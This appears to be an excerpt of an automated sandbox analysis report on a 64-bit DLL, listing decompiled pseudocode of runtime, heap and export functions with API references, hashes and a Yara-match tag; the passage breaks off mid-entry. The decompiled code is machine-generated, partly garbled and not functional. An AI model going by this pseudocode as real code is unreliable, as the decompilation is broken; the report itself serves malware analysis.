                                                                                                        • Instruction Fuzzy Hash: 9311EC6263CA9581DA84EB56EC9157B6360FBC5BC1F102037FE8E87B9ADE2DD400CB54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 65%
                                                                                                        			E00007FFC7FFC28903F18(void* __ecx) {
                                                                                                        				void* __rbx;
                                                                                                        				void* _t12;
                                                                                                        				void* _t17;
                                                                                                        				void* _t18;
                                                                                                        				void* _t19;
                                                                                                        				void* _t20;
                                                                                                        
                                                                                                        				_t2 =  ==  ? 1 :  *0x2897f1a0 & 0x000000ff;
                                                                                                        				 *0x2897f1a0 =  ==  ? 1 :  *0x2897f1a0 & 0x000000ff;
                                                                                                        				E00007FFC7FFC28904760(1, _t12, _t17, _t18, _t19, _t20);
                                                                                                        				if (E00007FFC7FFC28906AC0() != 0) goto 0x28903f47;
                                                                                                        				goto 0x28903f5b; // executed
                                                                                                        				E00007FFC7FFC2890A844(_t17); // executed
                                                                                                        				if (0 != 0) goto 0x28903f59;
                                                                                                        				E00007FFC7FFC28906B1C(0);
                                                                                                        				goto 0x28903f43;
                                                                                                        				return 1;
                                                                                                        			}









                                                                                                        0x7ffc28903f2c
                                                                                                        0x7ffc28903f2f
                                                                                                        0x7ffc28903f35
                                                                                                        0x7ffc28903f41
                                                                                                        0x7ffc28903f45
                                                                                                        0x7ffc28903f47
                                                                                                        0x7ffc28903f4e
                                                                                                        0x7ffc28903f52
                                                                                                        0x7ffc28903f57
                                                                                                        0x7ffc28903f60

                                                                                                        APIs
                                                                                                        • __isa_available_init.LIBCMT ref: 00007FFC28903F35
                                                                                                        • __vcrt_initialize.LIBVCRUNTIME ref: 00007FFC28903F3A
                                                                                                          • Part of subcall function 00007FFC28906AC0: __vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00007FFC28906AC4
                                                                                                          • Part of subcall function 00007FFC28906AC0: __vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00007FFC28906AC9
                                                                                                          • Part of subcall function 00007FFC28906AC0: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00007FFC28906ACE
                                                                                                        • __vcrt_uninitialize.LIBVCRUNTIME ref: 00007FFC28903F52
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __isa_available_init__vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_pure_virtual_call_handler__vcrt_initialize_winapi_thunks__vcrt_uninitialize
                                                                                                        • String ID:
                                                                                                        • API String ID: 3388242289-0
                                                                                                        • Opcode ID: 5d9032b98b00912ce65cde94096c8696e72d1c768cb864a179bbf2be0d6f6683
                                                                                                        • Instruction ID: f7442454fd1578cc5f8ed304cfd2bb46b3eea0b71fb83f68077860b963e25235
                                                                                                        • Opcode Fuzzy Hash: 5d9032b98b00912ce65cde94096c8696e72d1c768cb864a179bbf2be0d6f6683
                                                                                                        • Instruction Fuzzy Hash: 02E0E550E0C2BE45FE2936712C522B916A4CF16302F4840BBDA5E962C3CE0F6459E579
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 37%
                                                                                                        			E00007FFC7FFC28913F70() {
                                                                                                        				long long _v24;
                                                                                                        				long long _t5;
                                                                                                        				intOrPtr _t7;
                                                                                                        
                                                                                                        				_v24 = 0;
                                                                                                        				_t7 =  *0x2897fdd8; // 0x180000000
                                                                                                        				E00007FFC7FFC28919600(_t5, "fx", _t7, "DllRegisterServer");
                                                                                                        				_v24 = _t5;
                                                                                                        				ExitProcess(??);
                                                                                                        			}






                                                                                                        0x7ffc28913f74
                                                                                                        0x7ffc28913f84
                                                                                                        0x7ffc28913f92
                                                                                                        0x7ffc28913f97
                                                                                                        0x7ffc28913f9c

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExitProcess
                                                                                                        • String ID: DllRegisterServer
                                                                                                        • API String ID: 621844428-1663957109
                                                                                                        • Opcode ID: daa4509797ac003af5991cc102a2f8bbc2bd6225bef9e83475646ccea547d58a
                                                                                                        • Instruction ID: ea4f2bfb579af563acd47712d0d95f0e07b15a151061b5dba3bfafe2d6ba3a25
                                                                                                        • Opcode Fuzzy Hash: daa4509797ac003af5991cc102a2f8bbc2bd6225bef9e83475646ccea547d58a
                                                                                                        • Instruction Fuzzy Hash: 2BD09E71918A9A81DA20BB54FC4539A63A0FB8834AFC00137D58C56AA8DF7CD259CB68
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 37%
                                                                                                        			E00007FFC7FFC2890DEA8(void* __ecx, long long __rbx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                                                        				signed char _t53;
                                                                                                        				signed int _t54;
                                                                                                        				void* _t73;
                                                                                                        				long long _t77;
                                                                                                        				intOrPtr _t78;
                                                                                                        				void* _t95;
                                                                                                        				long _t98;
                                                                                                        
                                                                                                        				_t73 = _t95;
                                                                                                        				 *((long long*)(_t73 + 8)) = __rbx;
                                                                                                        				 *((long long*)(_t73 + 0x10)) = __rbp;
                                                                                                        				 *((long long*)(_t73 + 0x18)) = __rsi;
                                                                                                        				 *((long long*)(_t73 + 0x20)) = __rdi;
                                                                                                        				r14d = 0;
                                                                                                        				_t77 =  *((intOrPtr*)(0x7ffc2897f968)) + 2;
                                                                                                        				if (_t77 - 1 <= 0) goto 0x2890defb;
                                                                                                        				 *0x7FFC2897F978 =  *0x7FFC2897F978 | 0x00000080;
                                                                                                        				goto 0x2890df86;
                                                                                                        				 *0x7FFC2897F978 = 0x81;
                                                                                                        				if (0 == 0) goto 0x2890df1c;
                                                                                                        				if (0 == 0) goto 0x2890df15;
                                                                                                        				goto 0x2890df21;
                                                                                                        				goto 0x2890df21;
                                                                                                        				GetStdHandle(_t98);
                                                                                                        				_t21 = _t77 + 1; // 0x1
                                                                                                        				if (_t21 - 1 <= 0) goto 0x2890df61;
                                                                                                        				_t53 = GetFileType(??); // executed
                                                                                                        				if (_t53 == 0) goto 0x2890df61;
                                                                                                        				_t54 = _t53 & 0x000000ff;
                                                                                                        				 *((long long*)(0x7ffc2897f968)) = _t77;
                                                                                                        				if (_t54 != 2) goto 0x2890df55;
                                                                                                        				 *0x7FFC2897F978 =  *0x7FFC2897F978 | 0x00000040;
                                                                                                        				goto 0x2890df86;
                                                                                                        				if (_t54 != 3) goto 0x2890df86;
                                                                                                        				 *0x7FFC2897F978 =  *0x7FFC2897F978 | 0x00000008;
                                                                                                        				goto 0x2890df86;
                                                                                                        				 *0x7FFC2897F978 =  *0x7FFC2897F978 | 0x00000040;
                                                                                                        				 *((long long*)( *0x7FFC2E6ED6A8 + 0x28)) = 0xfffffffe;
                                                                                                        				_t78 =  *0x2897fd78; // 0x0
                                                                                                        				if (_t78 == 0) goto 0x2890df86;
                                                                                                        				 *((intOrPtr*)( *((intOrPtr*)(_t98 + _t78)) + 0x18)) = 0xfffffffe;
                                                                                                        				if (1 != 3) goto 0x2890dec6;
                                                                                                        				return _t54;
                                                                                                        			}










                                                                                                        0x7ffc2890dea8
                                                                                                        0x7ffc2890deab
                                                                                                        0x7ffc2890deaf
                                                                                                        0x7ffc2890deb3
                                                                                                        0x7ffc2890deb7
                                                                                                        0x7ffc2890dec3
                                                                                                        0x7ffc2890dee7
                                                                                                        0x7ffc2890deef
                                                                                                        0x7ffc2890def1
                                                                                                        0x7ffc2890def6
                                                                                                        0x7ffc2890defb
                                                                                                        0x7ffc2890df04
                                                                                                        0x7ffc2890df09
                                                                                                        0x7ffc2890df13
                                                                                                        0x7ffc2890df1a
                                                                                                        0x7ffc2890df21
                                                                                                        0x7ffc2890df2a
                                                                                                        0x7ffc2890df32
                                                                                                        0x7ffc2890df37
                                                                                                        0x7ffc2890df3f
                                                                                                        0x7ffc2890df41
                                                                                                        0x7ffc2890df44
                                                                                                        0x7ffc2890df4c
                                                                                                        0x7ffc2890df4e
                                                                                                        0x7ffc2890df53
                                                                                                        0x7ffc2890df58
                                                                                                        0x7ffc2890df5a
                                                                                                        0x7ffc2890df5f
                                                                                                        0x7ffc2890df61
                                                                                                        0x7ffc2890df66
                                                                                                        0x7ffc2890df6f
                                                                                                        0x7ffc2890df79
                                                                                                        0x7ffc2890df7f
                                                                                                        0x7ffc2890df8f
                                                                                                        0x7ffc2890dfaf

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileHandleType
                                                                                                        • String ID:
                                                                                                        • API String ID: 3000768030-0
                                                                                                        • Opcode ID: 8195fa56953df887960c625c907aa558cd447f31b22e017c21e87f709c57afde
                                                                                                        • Instruction ID: e47d3f83a20afeb52a33b88f995ff55c3740f8048d5b6d04b102cd782b9c7425
                                                                                                        • Opcode Fuzzy Hash: 8195fa56953df887960c625c907aa558cd447f31b22e017c21e87f709c57afde
                                                                                                        • Instruction Fuzzy Hash: 0831D832A28B6A81DB609F189D401782650FB45BB1F68033BEB6E473E0CF3AF451C318
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 68%
                                                                                                        			E00007FFC7FFC2890A9DC(intOrPtr* __rax, void* __rcx) {
                                                                                                        				int _t1;
                                                                                                        				intOrPtr _t3;
                                                                                                        				void* _t4;
                                                                                                        				void* _t11;
                                                                                                        				intOrPtr _t14;
                                                                                                        
                                                                                                        				if (__rcx == 0) goto 0x2890aa17;
                                                                                                        				_t14 =  *0x2897f930; // 0x1fd02540000, executed
                                                                                                        				_t1 = HeapFree(_t11, ??); // executed
                                                                                                        				if (_t1 != 0) goto 0x2890aa12;
                                                                                                        				_t3 = E00007FFC7FFC2890B34C(GetLastError(), __rax, _t14, __rcx);
                                                                                                        				_t4 = E00007FFC7FFC2890B420(__rax);
                                                                                                        				 *__rax = _t3;
                                                                                                        				return _t4;
                                                                                                        			}








                                                                                                        0x7ffc2890a9df
                                                                                                        0x7ffc2890a9eb
                                                                                                        0x7ffc2890a9f2
                                                                                                        0x7ffc2890a9fa
                                                                                                        0x7ffc2890aa04
                                                                                                        0x7ffc2890aa0b
                                                                                                        0x7ffc2890aa10
                                                                                                        0x7ffc2890aa17

                                                                                                        APIs
                                                                                                        • RtlReleasePrivilege.NTDLL(?,?,00000000,00007FFC2890F492,?,?,?,00007FFC2890F4CF,?,?,00000000,00007FFC2890F144,?,?,?,00007FFC2890F077), ref: 00007FFC2890A9F2
                                                                                                        • GetLastError.KERNEL32(?,?,00000000,00007FFC2890F492,?,?,?,00007FFC2890F4CF,?,?,00000000,00007FFC2890F144,?,?,?,00007FFC2890F077), ref: 00007FFC2890A9FC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastPrivilegeRelease
                                                                                                        • String ID:
                                                                                                        • API String ID: 1334314998-0
                                                                                                        • Opcode ID: 1178260e8bffcb175f16ce8929f72affff1d2575aebcf493ec367cb625912061
                                                                                                        • Instruction ID: 6f5788ed61210d9dfe0c6efbc800e8e42367b96069baf72221c2333f259b3c49
                                                                                                        • Opcode Fuzzy Hash: 1178260e8bffcb175f16ce8929f72affff1d2575aebcf493ec367cb625912061
                                                                                                        • Instruction Fuzzy Hash: 0EE08C50F1A22A82FF097BF26C441782195DF94B42F445036C90D662D2EE2CA855C27C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
                                                                                                        • Instruction ID: b9dfd44ec2654d149dbfc67a3d285e1c446cc2681133f70a5a1c8efdf6c35088
                                                                                                        • Opcode Fuzzy Hash: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
                                                                                                        • Instruction Fuzzy Hash: 59415D7090C7848FE7B8DF18D48979ABBE0FB88315F108A1EE48DC7291DB349448CB46
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 50%
                                                                                                        			E00007FFC7FFC289022B0(long long __rax, long long __rcx, long long __rdx, long long _a8, long long _a16, signed char _a24) {
                                                                                                        				long long _v16;
                                                                                                        				signed char _v24;
                                                                                                        				intOrPtr* _t48;
                                                                                                        				intOrPtr* _t50;
                                                                                                        
                                                                                                        				_t48 = __rax;
                                                                                                        				_a24 = r8b;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				E00007FFC7FFC28902830(__rax, _a8);
                                                                                                        				if (_t48 - _a16 >= 0) goto 0x289022de;
                                                                                                        				E00007FFC7FFC28902230(_a8);
                                                                                                        				E00007FFC7FFC28902150(_t48, _a8);
                                                                                                        				if ( *_t48 - _a16 >= 0) goto 0x28902310;
                                                                                                        				E00007FFC7FFC28902170(_t48, _a8);
                                                                                                        				E00007FFC7FFC28902600(_a8, _a16,  *_t48); // executed
                                                                                                        				goto 0x2890237a;
                                                                                                        				if ((_a24 & 0x000000ff) == 0) goto 0x28902366;
                                                                                                        				if (_a16 - 0x10 >= 0) goto 0x28902366;
                                                                                                        				E00007FFC7FFC28902170(_t48, _a8);
                                                                                                        				if (_a16 -  *_t48 >= 0) goto 0x28902341;
                                                                                                        				_t50 = _a16;
                                                                                                        				_v16 = _t50;
                                                                                                        				goto 0x28902353;
                                                                                                        				E00007FFC7FFC28902170(_t50, _a8);
                                                                                                        				_v16 =  *_t50;
                                                                                                        				E00007FFC7FFC28901910(1,  *_t50, _a8, _v16);
                                                                                                        				goto 0x2890237a;
                                                                                                        				if (_a16 != 0) goto 0x2890237a;
                                                                                                        				E00007FFC7FFC289023A0( *_t50, _a8, _a16);
                                                                                                        				if (_a16 <= 0) goto 0x2890238c;
                                                                                                        				_v24 = 1;
                                                                                                        				goto 0x28902394;
                                                                                                        				_v24 = 0;
                                                                                                        				return _v24 & 0x000000ff;
                                                                                                        			}







                                                                                                        0x7ffc289022b0
                                                                                                        0x7ffc289022b0
                                                                                                        0x7ffc289022b5
                                                                                                        0x7ffc289022ba
                                                                                                        0x7ffc289022c8
                                                                                                        0x7ffc289022d2
                                                                                                        0x7ffc289022d9
                                                                                                        0x7ffc289022e3
                                                                                                        0x7ffc289022f0
                                                                                                        0x7ffc289022f7
                                                                                                        0x7ffc28902309
                                                                                                        0x7ffc2890230e
                                                                                                        0x7ffc28902317
                                                                                                        0x7ffc2890231f
                                                                                                        0x7ffc28902326
                                                                                                        0x7ffc28902333
                                                                                                        0x7ffc28902335
                                                                                                        0x7ffc2890233a
                                                                                                        0x7ffc2890233f
                                                                                                        0x7ffc28902346
                                                                                                        0x7ffc2890234e
                                                                                                        0x7ffc2890235f
                                                                                                        0x7ffc28902364
                                                                                                        0x7ffc2890236c
                                                                                                        0x7ffc28902375
                                                                                                        0x7ffc28902380
                                                                                                        0x7ffc28902382
                                                                                                        0x7ffc2890238a
                                                                                                        0x7ffc2890238c
                                                                                                        0x7ffc2890239d

                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FFC28902830: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC2890283E
                                                                                                          • Part of subcall function 00007FFC28902830: Concurrency::details::SchedulerBase::ThrottlerDispatchBridge.LIBCMTD ref: 00007FFC2890284B
                                                                                                        • _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFC289022D9
                                                                                                          • Part of subcall function 00007FFC28902170: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC2890217E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$EmptyQueue::StructuredWork$Base::BridgeDispatchMtx_guardMtx_guard::~_SchedulerThrottler
                                                                                                        • String ID:
                                                                                                        • API String ID: 1903167320-0
                                                                                                        • Opcode ID: aff1851cebf3f965b07721a628662be7775e5ed75af6ef4fe029cf6c3e1b761c
                                                                                                        • Instruction ID: 839ed7cebccdf22d58318f979c836a75d0c4dae210cb355d753161c3faf2777f
                                                                                                        • Opcode Fuzzy Hash: aff1851cebf3f965b07721a628662be7775e5ed75af6ef4fe029cf6c3e1b761c
                                                                                                        • Instruction Fuzzy Hash: 3721EF2290CA5981DA21AB95EC5037E6770FBC5B85F204433E78D476E9CE3FD580CB18
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 37%
                                                                                                        			E00007FFC7FFC2890AAD0(void* __eax, signed int __rcx, signed int __rdx) {
                                                                                                        				intOrPtr* _t22;
                                                                                                        				signed int _t29;
                                                                                                        
                                                                                                        				_t29 = __rdx;
                                                                                                        				if (__rcx == 0) goto 0x2890aaef;
                                                                                                        				_t1 = _t29 - 0x20; // -32
                                                                                                        				_t22 = _t1;
                                                                                                        				if (_t22 - __rdx < 0) goto 0x2890ab32;
                                                                                                        				_t25 =  ==  ? _t22 : __rcx * __rdx;
                                                                                                        				goto 0x2890ab16;
                                                                                                        				if (E00007FFC7FFC2890E958() == 0) goto 0x2890ab32;
                                                                                                        				if (E00007FFC7FFC289097EC(_t22,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x2890ab32;
                                                                                                        				RtlAllocateHeap(??, ??, ??); // executed
                                                                                                        				if (_t22 == 0) goto 0x2890ab01;
                                                                                                        				goto 0x2890ab3f;
                                                                                                        				E00007FFC7FFC2890B420(_t22);
                                                                                                        				 *_t22 = 0xc;
                                                                                                        				return 0;
                                                                                                        			}





                                                                                                        0x7ffc2890aad0
                                                                                                        0x7ffc2890aadf
                                                                                                        0x7ffc2890aae3
                                                                                                        0x7ffc2890aae3
                                                                                                        0x7ffc2890aaed
                                                                                                        0x7ffc2890aafb
                                                                                                        0x7ffc2890aaff
                                                                                                        0x7ffc2890ab08
                                                                                                        0x7ffc2890ab14
                                                                                                        0x7ffc2890ab25
                                                                                                        0x7ffc2890ab2e
                                                                                                        0x7ffc2890ab30
                                                                                                        0x7ffc2890ab32
                                                                                                        0x7ffc2890ab37
                                                                                                        0x7ffc2890ab44

                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(?,?,00000000,00007FFC2890BAAE,?,?,?,00007FFC2890B429,?,?,?,?,00007FFC28910426,?,?,00000000), ref: 00007FFC2890AB25
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 280286a628102559a8464dffd4b609b20cb420f0fe1f18d1be992a8bc7a4b5f6
                                                                                                        • Instruction ID: e487690c4442692302bb6a02ea31a7acdc498fa7a28450ac63f6adb50e80b04c
                                                                                                        • Opcode Fuzzy Hash: 280286a628102559a8464dffd4b609b20cb420f0fe1f18d1be992a8bc7a4b5f6
                                                                                                        • Instruction Fuzzy Hash: 92F04F45B1A22B85FE557BA15C112B512C6DF94742F4C4033C90D862C1ED2EE861D278
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 37%
                                                                                                        			E00007FFC7FFC2890AA18(intOrPtr* __rax, void* __rcx) {
                                                                                                        
                                                                                                        				if (__rcx - 0xffffffe0 > 0) goto 0x2890aa63;
                                                                                                        				_t16 =  ==  ? __rax : __rcx;
                                                                                                        				goto 0x2890aa4a;
                                                                                                        				if (E00007FFC7FFC2890E958() == 0) goto 0x2890aa63;
                                                                                                        				if (E00007FFC7FFC289097EC(__rax,  ==  ? __rax : __rcx) == 0) goto 0x2890aa63;
                                                                                                        				RtlAllocateHeap(??, ??, ??); // executed
                                                                                                        				if (__rax == 0) goto 0x2890aa35;
                                                                                                        				goto 0x2890aa70;
                                                                                                        				E00007FFC7FFC2890B420(__rax);
                                                                                                        				 *__rax = 0xc;
                                                                                                        				return 0;
                                                                                                        			}



                                                                                                        0x7ffc2890aa25
                                                                                                        0x7ffc2890aa2f
                                                                                                        0x7ffc2890aa33
                                                                                                        0x7ffc2890aa3c
                                                                                                        0x7ffc2890aa48
                                                                                                        0x7ffc2890aa56
                                                                                                        0x7ffc2890aa5f
                                                                                                        0x7ffc2890aa61
                                                                                                        0x7ffc2890aa63
                                                                                                        0x7ffc2890aa68
                                                                                                        0x7ffc2890aa75

                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(?,?,?,00007FFC2891040D,?,?,00000000,00007FFC2890D8B7,?,?,?,00007FFC2890A427,?,?,?,00007FFC2890A31D), ref: 00007FFC2890AA56
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 4885db743ff87431de90f68300da65782b6b7874996cc61f6450c8fa48a4abb9
                                                                                                        • Instruction ID: 1a08639a0cb995df1e9339a60fe9c13f949776c29eedd062968a656382250cdd
                                                                                                        • Opcode Fuzzy Hash: 4885db743ff87431de90f68300da65782b6b7874996cc61f6450c8fa48a4abb9
                                                                                                        • Instruction Fuzzy Hash: B1F05E01F1D22F48FE5477A15E4127911C1CF44BE2F080232D82E892C1DD6DA451C6B8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 44%
                                                                                                        			E00007FFC7FFC28901540(long long __rcx, long long _a8) {
                                                                                                        				long long _v24;
                                                                                                        				intOrPtr* _t9;
                                                                                                        				long long _t13;
                                                                                                        
                                                                                                        				_a8 = __rcx;
                                                                                                        				_v24 = 0xfffffffe;
                                                                                                        				r8d = 0;
                                                                                                        				E00007FFC7FFC28901910(1, _t9, _a8, _t13); // executed
                                                                                                        				return E00007FFC7FFC289017A0(_a8);
                                                                                                        			}






                                                                                                        0x7ffc28901540
                                                                                                        0x7ffc28901549
                                                                                                        0x7ffc28901552
                                                                                                        0x7ffc2890155c
                                                                                                        0x7ffc28901571

                                                                                                        APIs
                                                                                                        • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC28901567
                                                                                                          • Part of subcall function 00007FFC289017A0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC289017B1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
